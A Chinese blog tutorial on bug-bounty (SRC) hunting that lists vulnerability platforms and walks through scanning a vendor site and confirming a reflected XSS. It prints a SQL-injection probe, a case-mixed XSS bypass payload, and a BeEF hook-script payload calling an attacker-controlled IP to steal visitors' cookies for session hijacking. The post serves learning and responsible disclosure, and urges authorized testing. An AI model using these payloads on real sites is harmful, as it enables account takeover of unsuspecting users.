初识SRC漏洞平台提交漏洞

最新推荐文章于 2024-07-17 11:59:31 发布
最新推荐文章于 2024-07-17 11:59:31 发布
阅读量5.1w 收藏 417
点赞数 86
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37964989/article/details/88351145
版权

//由于初学时使用工具较多,不建议对目标进行大批量扫描,手测为主,工具为辅,下文仅作示例,明白大体流程即可,实操为真。

1.1 漏洞平台

补天漏洞响应平台:https://www.butian.net/

漏洞银行:https://www.bugbank.cn/

阿里云漏洞响应平台:https://security.alibaba.com/

i春秋SRC部落:https://www.ichunqiu.com/src

腾讯应急响应中心:https://security.tencent.com/index.php

网易、百度等等。

 

1.2 网站情况

常见漏洞类型:

XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

 

发现漏洞方法:

1. 手工寻找(XSS,SQL注入,CSRF等等)。

难度系数:⭐⭐⭐⭐  牛逼指数:⭐⭐⭐⭐⭐

一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。

 

2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)

难度系数:⭐⭐  牛逼指数:⭐⭐⭐

在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。

 

3. 手工寻找+工具扫描/辅助

难度系数:⭐⭐⭐  牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐

通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果

 

防护情况案例一:(可能会涉及到什么所以对厂商均打码)

厂商:

 

子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。

 

防护情况案例二:

厂商

 

找到asp脚本编写同时有id传参的页面

 

尝试注入语句

/video_list.aspx?s_classid=221 and 1=2

回车

 

防火墙拦截。

防护情况案例三:

厂商:大部分厂商

即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。

 

1.3 发现/提交漏洞

厂商

网址:

 

发现步骤

1. 手工寻找

网页的大部分新闻内容全为静态的内容,无下手之地。

 

直到

 

进入后是该网站的一个子网站,熟悉的php,寻找漏洞点

 

注册:

 

在手工找不到可能存在的漏洞点,尝试工具扫描

//2021年注:由于19年刚接触使用工具较多,现阶段原则上是不允许批量漏扫工具对网站进行扫描,多以手工加漏洞验证为主。

//以下示例仅熟悉流程即可,勿学博主用工具直接扫!!!!!!。勿学博主用工具直接扫!!!!!!

//手工测试可对url进行burp的xss语句检测即可。

 

使用工具(AWVS)进行站点扫描

幸运的是,该站点对扫描没有进行设置防御,

扫到该站点的目录

其中Forbidden是权限不够无法访问,但是文件存在。

 

接下来,很明显的看到了极有可能是后台admin目录

不幸的是,能访问,文件也存在,无回显内容

 

一片空白,继续换下一个思路

查看是否存在漏洞。

其中显目的第一个 Cross Site Scripting (XSS)

寻找到这三个漏洞点

 

 

进入直接弹出对话框

接下来看是什么地方存在漏洞点:

 

渗透测试XSS语句

'%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

经过简化

%22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束

 

效果等同于:"><ScRiPt >alert(123)</ScRiPt>

 

这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.

其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。

 

这也能说明当右键编辑http请求的时候会弹出对话框。

 

知道漏洞点漏洞原理后,找到漏洞点:

 

/index.php/core/uploader-image_cut?module=item&system=ask&url=e

 

 

其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。

利用测试语句测试漏洞的存在

 

漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,

 

接下来利用XSS漏洞

 

利用工具:beef (kali下的xss平台)

 

利用步骤:

 

1. beef工具平台开启

 

 

Kali ip:192.168.88.149

 

2. 制造XSS利用链接:

’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

 

 

3. 访问者访问

Win10

回车后,直观上网页无反应

 

4. 查看beef平台

 

可以看到ip,操作系统,系统软件的配置

重要的在下面

 

拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。

 

到此结束,没有进一步的渗透(还不会高级的)。

 

下面为漏洞提交的页面

 

 

 

1.4 思路总结

1. 学会工具和手工结合,会有意外收获。

2. 常规注入点,漏洞点别放过。

3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)

4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。

5. 最后提出解决方案,完事。

不做破坏!授权测试!

OKAY_TC
关注
  • 86
    点赞
  • 417
    收藏
    觉得还不错? 一键收藏
  • 18
    评论
专栏目录
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
SRC漏洞提交平台汇总
04-11 806
阿里巴巴集团安全应急响应中心。国家信息安全漏洞共享平台。去哪儿网安全应急响应中心。SRC漏洞提交平台汇总。腾讯安全应急响应中心。京东安全应急响应中心。新浪安全应急响应中心。金山安全应急响应中心。蚂蚁金服安全响应中心。银联安全应急响应中心。同程安全应急响应中心。
怎么入门SRC漏洞挖掘,src漏洞新手怎么入门
weixin_68789096的博客
06-16 2382
SRC漏洞挖掘是现代互联网安全领域的一个重要分支,是许多企业和组织确保其软件和数据安全性的必要手段。虽然SRC漏洞挖掘看上去很高级,但其实它所涉及的一些基础知识和工具都是可以学习和掌握的。
十大SRC平台SRC行业安全测试规范
Innocence_0的博客
07-11 1080
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。腾讯SRC、蚂蚁金服SRC、ASRC、阿里云先知、百度SRC、本地生活SRC、菜鸟SRC、滴滴SRC、京东SRC、LYSRC、蘑菇街SRC、陌陌SRC、360SRC、苏宁SRC、同舟共测-腾讯因此遭受损失的,您也应当一并赔偿。
SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台
youmaob的博客
03-27 3320
SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台
各种SRC(应急响应)中心平台漏洞提交
m0_62207482的博客
12-11 3792
alert(1)
认识SRC漏洞平台
m0_49936858的博客
08-13 1057
一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。...
SSRF漏洞初识
现代鲁滨逊的博客
08-17 359
文章目录一 、介绍二、成因三、SSRF 漏洞出现的场景PHP相关函数四、ssrf利用五、漏洞判断1.回显2.延时3.DNS请求六、防御 一 、介绍 ssrf(Server-Side Request Forgery:服务器端请求伪造): 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 二、成因 都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3645
web安全-SSTI模板注入漏洞
xss漏洞学习小结,详不详细你说了算
MSB_WLAQ的博客
10-09 846
xss漏洞小结 一、初识XSS 1、什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 coo.
初识Activiti
jtf8525140的专栏
01-12 549
1. 初识Activiti 1.1. 工作流与工作流引擎 工作流(workflow)就是工作流程的计算模型,即将工作流程中的工作如何前后组织在一起的逻辑和规则在计算机中以恰当的模型进行表示并对其实施计算。它主要解决的是“使在多个参与者之间按照某种预定义的规则传递文档、信息或任务的过程自动进行,从而实现某个预期的业务目标,或者促使此目标的实现”。(将部分或者全部的工作流程、逻辑让计算机帮你
提交漏洞报告的细节和利用
weixin_40418457的博客
05-19 632
细节 昨天在后台收到了几个漏洞报告,忍不住吐槽一下,其中一篇写了可以SSRF访问内网Jenkins,虽然SSRF漏洞确实是存在的,可是人家的Jenkins 在外网就可以访问到!!!直接输入Jenkins.XXX.COM就可以访问到!! 还有同样的服务,同样的SSRF造成的危害是不一样的,比如下边两个SSRF都可以访问阿里云元数据,但是一个服务器配置了RAM,另一个没有配RAM,那么造成影响也是不一样的。 ​
国内漏洞提交平台
阿大撒大撒的博客
12-26 2633
可在搜索引擎内进行搜索,关键词为:安全应急响应中心、SRC、众测、漏洞平台等。
怎么入门SRC漏洞挖掘
hdwlwang的博客
05-08 1979
2. SRC的工作过程 SRC的成员发现漏洞,确认漏洞,报告漏洞,修复漏洞,并公开发布漏洞信息和修复信息。2. 漏洞识别漏洞识别是SRC漏洞挖掘重要的一步。3. 拓展攻击面针对已经确定的漏洞,可以尝试进一步拓展攻击面,以便确定该漏洞的影响范围、漏洞的类型等信息。总结: SRC漏洞挖掘工作需要遵守法律和道德、多人协作,并加强注意事项的细节,只有这样,我们才能更好地保护系统安全、预防恶意行为对系统带来的破坏。2. 加强团队合作 SRC漏洞挖掘需要团队合作,漏洞挖掘工作需要多人协作,以确保发现并解决所有漏洞
SRC逻辑漏洞挖掘详解以及思路和技巧(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-17 931
由于程序逻辑不严谨或逻辑太过复杂,导致一些逻辑分支不能正常处理或处理错误,统称为业务逻辑漏洞。常见的逻辑漏洞有交易支付、密码修改、密码找回、越权修改、越权查询、突破限制等,下图是简单的逻辑漏洞总结,在挖掘的过程中更多的时候需要脑洞大开:挖掘逻辑漏洞的过程中,需要一些技巧和非常规思路,有点像边缘测试的思想。确定业务流程--->寻找流程中可以被操控的环节--->分析可被操控环节中可能产生的逻辑问题--->尝试修改参数触发逻辑问题0X01 逻辑漏洞分类。
[SRC初探]手持新手卡挖SRC逻辑漏洞心得分享
dfdhxb995397的博客
05-09 1022
文章来源i春秋 本文适合新手参阅,大牛笑笑就好了,嘿嘿末尾有彩蛋!!!!!!!!!!!!!!!!!本人参加了本次"i春秋部落守卫者联盟"活动,由于经验不足,首次挖SRC,排名不是那么理想,终于知道了自己的白帽子挖洞的道路还漫长的很,老司机岂非一日一年能炼成的。本文多处引用了YSRC的公(qi)开(yin)漏(ji)洞(qiao)。挖SRC思路一定要广!!!!漏洞不会仅限于SQL注...
初识uni-app框架
10-08
uni-app是一款基于Vue.js的前端开发框架,可以快速开发跨平台的移动应用程序,包括iOS、Android、H5、小程序等多个平台。通过uni-app,可以使用一套代码同时在多个平台上运行,大大提高了开发效率。 初识uni-app框架,可以从以下几个方面入手: 1. 开发环境准备:首先,需要安装Node.js环境和HBuilderX开发工具,Node.js用于运行JavaScript代码,HBuilderX是uni-app的开发工具。 2. 项目搭建:在HBuilderX中创建uni-app项目,选择需要开发的平台,例如小程序、H5等。 3. 项目结构:uni-app的项目结构类似于Vue.js的项目结构,包含了页面、组件、静态资源等文件夹,可以根据需要进行扩展和修改。 4. 页面开发:使用Vue.js的语法和uni-app的组件开发页面,可以使用Vue的生命周期函数、指令、事件等进行页面逻辑编写。 5. 跨平台开发:uni-app支持多个平台的开发,可以在同一个项目中编写一套代码,在不同平台上进行预览和调试。 6. 发布与打包:开发完成后,可以选择发布到不同平台上,uni-app提供了丰富的打包和发布选项,可以根据需求进行配置。 总之,初识uni-app框架需要了解它的开发环境准备、项目搭建、页面开发、跨平台开发以及发布与打包等基本概念和操作。通过学习这些内容,可以快速上手uni-app框架,并开始开发跨平台应用程序。
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值